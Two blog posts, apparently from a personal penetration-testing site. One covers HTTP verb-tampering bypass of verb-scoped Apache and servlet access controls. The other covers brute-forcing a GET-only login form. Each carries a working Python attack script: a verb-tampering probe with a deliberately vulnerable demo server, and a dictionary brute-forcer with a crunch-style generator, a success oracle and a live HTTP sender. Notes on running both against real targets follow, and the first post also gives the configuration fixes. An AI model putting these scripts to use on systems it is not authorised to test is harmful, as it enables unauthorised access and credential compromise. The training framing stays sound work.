VBAAC Bypass – Verb Based Authentication and Access Control.

This post is dedicated to VBAAC (verb-based authentication and access control) bypass, which is detailed in the ongoing research documentation I have been writing. It belongs to the 'Web Application Exploitation' series and is pinned to this post as a personal reference. Work has exploded lately, and to be able to trace back everything that has been done, everything about the paper goes here. The contents of this post are entirely devoted to personal research; the blog itself is personal.

What is covered in VBAAC Bypass:

  • Concept of server-side controls.
  • HTTP RFCs for 'verbs'.
  • WebDAV 'verbs' or 'methods'.
  • Access control mechanisms in Apache.
  • Configuring Apache to make use of the access control configuration.
  • Using a .htaccess file for access control.
  • Example web.xml configuration for a JSP/servlet container.
  • Example .htaccess configuration protecting a resource on an Apache server.
  • Snippet of application code subject to VBAAC bypass.
  • Authentication vs. authorization on Apache web servers.
  • Techniques to bypass 'method' or 'verb' restrictions.
  • Bypass via HEAD.
  • Bypass via an arbitrary 'verb'.
  • Application-server configuration based 'verb' bypass.
  • Defeating authentication, and hence authorization, via verb-based bypass techniques.

The documentation first walks through building a web application, and only then through bypassing authentication on it. Because URL-based access control protects resources with 'Basic' or 'Digest' authentication, a very brief primer on the standardized HTTP 'verbs' is provided; it is needed throughout the document. A good number of WebDAV verbs are also listed, with their RFCs attached. Samples of the work are attached below and are for private purposes only. The document itself is not public.
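As an added illustration that is not part of the paper or this post, the script below models the two sides of the bypass. The first part is a set of pure functions that mirror, under simplified assumptions, how an Apache <Limit>/<LimitExcept> block and a web.xml <security-constraint> decide whether a verb is gated (Apache treats a GET limit as also covering HEAD; the servlet constraint covers only the verbs it lists, and an empty list covers all of them). The second part is a deliberately vulnerable local HTTP server that asks for Basic credentials only on GET and POST, and a probe that sends HEAD, OPTIONS and a made-up verb without credentials. The path /admin, the demo credential admin:secret and the verb list are assumptions made for the example.

```python
"""Verb tampering against verb-scoped access control (added example)."""
import base64
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


def apache_limit_requires_auth(limited, method):
    """<Limit A B> ... Require valid-user </Limit>: only the listed verbs are
    gated. Apache treats a GET limit as also covering HEAD; any other verb,
    including an arbitrary one such as FOO, is not covered at all."""
    gated = {m.upper() for m in limited}
    if "GET" in gated:
        gated.add("HEAD")
    return method.upper() in gated


def apache_limit_except_requires_auth(exempt, method):
    """<LimitExcept A B> ... Require valid-user </LimitExcept>: every verb NOT
    listed is gated, which is the safe way to write a verb-scoped rule."""
    return method.upper() not in {m.upper() for m in exempt}


def web_xml_requires_auth(listed, method):
    """<security-constraint> with <http-method> entries: only the listed verbs
    are constrained; an empty list constrains every verb. No GET->HEAD rule."""
    return not listed or method.upper() in {m.upper() for m in listed}


CREDENTIAL = "Basic " + base64.b64encode(b"admin:secret").decode()  # demo only


class GetPostOnlyHandler(BaseHTTPRequestHandler):
    """Deliberately vulnerable: asks for credentials only on GET and POST,
    like a web.xml constraint that lists just those two methods."""
    GATED = {"GET", "POST"}
    protocol_version = "HTTP/1.0"

    def log_message(self, *args):  # keep the demo quiet
        pass

    def __getattr__(self, name):
        # Route every verb, known or made up, into the same handler so the
        # server never answers 501 for a verb it has not heard of.
        if name.startswith("do_"):
            return self._serve
        raise AttributeError(name)

    def _serve(self):
        if self.command in self.GATED and self.headers.get("Authorization") != CREDENTIAL:
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="admin"')
            self.end_headers()
            return
        body = b"secret admin panel\n"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        if self.command != "HEAD":
            self.wfile.write(body)


def probe(host, port, path, verbs=("GET", "POST", "HEAD", "OPTIONS", "FOO")):
    """Send each verb with no credentials; a 200 on a verb whose GET answers
    401 is the bypass. Returns {verb: status}."""
    results = {}
    for verb in verbs:
        conn = http.client.HTTPConnection(host, port, timeout=5)
        conn.request(verb, path)
        resp = conn.getresponse()
        resp.read()
        conn.close()
        results[verb] = resp.status
    return results


def demo():
    """Start the vulnerable server on an ephemeral port, probe it, shut down."""
    srv = HTTPServer(("127.0.0.1", 0), GetPostOnlyHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        return probe("127.0.0.1", srv.server_address[1], "/admin")
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    for verb, status in demo().items():
        print(f"{verb:8s} -> {status}")
```

Against a real target the same probe is run with the host and path of the protected resource; the thing to compare is the status of GET against HEAD, OPTIONS and an unknown verb. The fix on the Apache side is <LimitExcept> (or no <Limit> at all, so the Require applies to every verb); on the servlet side it is to list no methods in the constraint, or to use <deny-uncovered-http-methods/> where the container supports Servlet 3.1.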

 

Sample images from the paper (captions only): Verb 0, Verb 1, Verb 2, Verb 3, Verb 4, Verb 5

 

Had a great day going ahead with improving my drafting skills, and I have been getting a good grip on web application penetration testing from within corporate companies. The point of the research is to bring the real penetration-testing scenario back to the general public and to make aware the people out there whose security awareness has been eroded by their culture. Have a great weekend ahead!


Web Form Bruteforcing for Web Applications.

Hi,

This is yet another post, on how to conduct a web form brute-force attack against a web application using the GET method rather than a POST request, because the target application accepts GET-based requests only. This series of research papers on exploiting a target web application set up for vulnerability analysis is conducted for 'testing' and 'training' purposes.

What’s different with the research?

I have personally gone over and worked out 'several' ways, not just 'one' way, to tackle the web application as a target. This first post and the paper itself deliver the 'attack' using different methods rather than 'sticking' to one particular method of exploitation. The papers are not open to everyone and are being kept private for reasons. However, this first paper will be public.

What’s not included in the paper?

I have held back from adding yet 'another' method to the public version of the paper. This is done to keep the presentation limited to four methods; there are five or more possible methods of conducting the same exploitation against the target.

Sample images of the paper?

Here are some sample images taken from the papers:

 

Sample images from the paper (captions only): Sample 1, Sample 2, Sample 3

 

What are some of the methods explained?

Some of the methods explained for brute-forcing the web form login of the targeted web application include:

  • Exploitation via crunch-generated username and password files
  • Exploitation using Burp Suite Intruder
  • Exploitation using a Python script for automation
  • Exploitation using WebSlayer by feeding the generated dictionaries into the tool
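The Python automation method is the one that can be shown in full here. The script below is an added example written for this post, not the script from the paper: it generates candidates the way crunch does (every string of a given length range over a charset), puts the credentials in the query string because the form only accepts GET, and decides on a hit by comparing each response with a baseline failed login rather than by status code alone. Redirects are deliberately not followed, since a 302 after a login is usually the success signal. The parameter names username/password, the URL http://target.example/login and the fake_target responder are assumptions constructed for the demo; http_get is the sender to use against a live form.

```python
"""Web form brute force over GET (added example; target is a constructed stand-in)."""
import itertools
import urllib.error
import urllib.parse
import urllib.request


def crunch(min_len, max_len, charset):
    """Every string of length min_len..max_len over charset, in the same
    order `crunch <min> <max> <charset>` prints them."""
    for n in range(min_len, max_len + 1):
        for combo in itertools.product(charset, repeat=n):
            yield "".join(combo)


def build_login_url(base, user, password, user_field="username", pass_field="password"):
    """Credentials go in the query string because the form only accepts GET."""
    return base + "?" + urllib.parse.urlencode({user_field: user, pass_field: password})


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """A 302 after a login is usually the success signal, so do not follow it."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


_OPENER = urllib.request.build_opener(_NoRedirect)


def http_get(url):
    """Sender for a live target: returns (status, body) and treats 3xx/4xx/5xx
    as data rather than as exceptions."""
    req = urllib.request.Request(url, headers={"User-Agent": "form-bruteforce-demo"})
    try:
        with _OPENER.open(req, timeout=10) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def baseline_oracle(fail_status, fail_body):
    """A login page answers every bad attempt the same way; anything that
    differs from that baseline (new status, new length) is flagged as a hit."""
    def is_success(status, body):
        return status != fail_status or len(body) != len(fail_body)
    return is_success


def brute_force(base, users, passwords, is_success, send=http_get):
    """Try every (user, password) pair; return (user, password, attempts) on
    the first hit, or None when the lists are exhausted."""
    passwords = list(passwords)  # a generator must survive the outer loop
    attempts = 0
    for user in users:
        for password in passwords:
            attempts += 1
            status, body = send(build_login_url(base, user, password))
            if is_success(status, body):
                return user, password, attempts
    return None


def fake_target(url):
    """Constructed stand-in for the GET-only login form (no network needed)."""
    query = urllib.parse.parse_qs(urllib.parse.urlparse(url).query)
    if query.get("username") == ["admin"] and query.get("password") == ["ab1"]:
        return 302, b""
    return 200, b"<p>Invalid username or password</p>"


def demo():
    base = "http://target.example/login"
    # One probe with junk credentials captures what a failed login looks like.
    oracle = baseline_oracle(*fake_target(build_login_url(base, "nobody", "nothing")))
    return brute_force(base, ["guest", "admin"], crunch(3, 3, "ab1"), oracle, send=fake_target)


if __name__ == "__main__":
    print(demo())
```

Against a real form, swap fake_target for the default http_get and take the baseline from one deliberately wrong attempt; the crunch generator is where the size of the search explodes, so keep the charset and length range tight and let a lockout or rate limit show up in the oracle as a change of status rather than a false hit.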

I have refrained from discussing more methods in the paper because the paper itself is supposed to remain private, for various specific reasons. Those being trained under the 'Web Application Exploitation' course have access to these papers and benefit from them.

Where can this paper be downloaded from?

Currently this paper can be downloaded from my personal Dropbox. Later changes will not be reflected here, since the original paper is updated much sooner than this post. Download link: https://www.dropbox.com/s/6uebzfzm10db14h/1.%20Web-Form%20Brute%20Force%20Methods.pdf?m=

I am considering uploading these public papers in several places, so that if one site goes down they remain downloadable from another. This is one of a series of papers to come. Some of them will definitely be public; others won't be.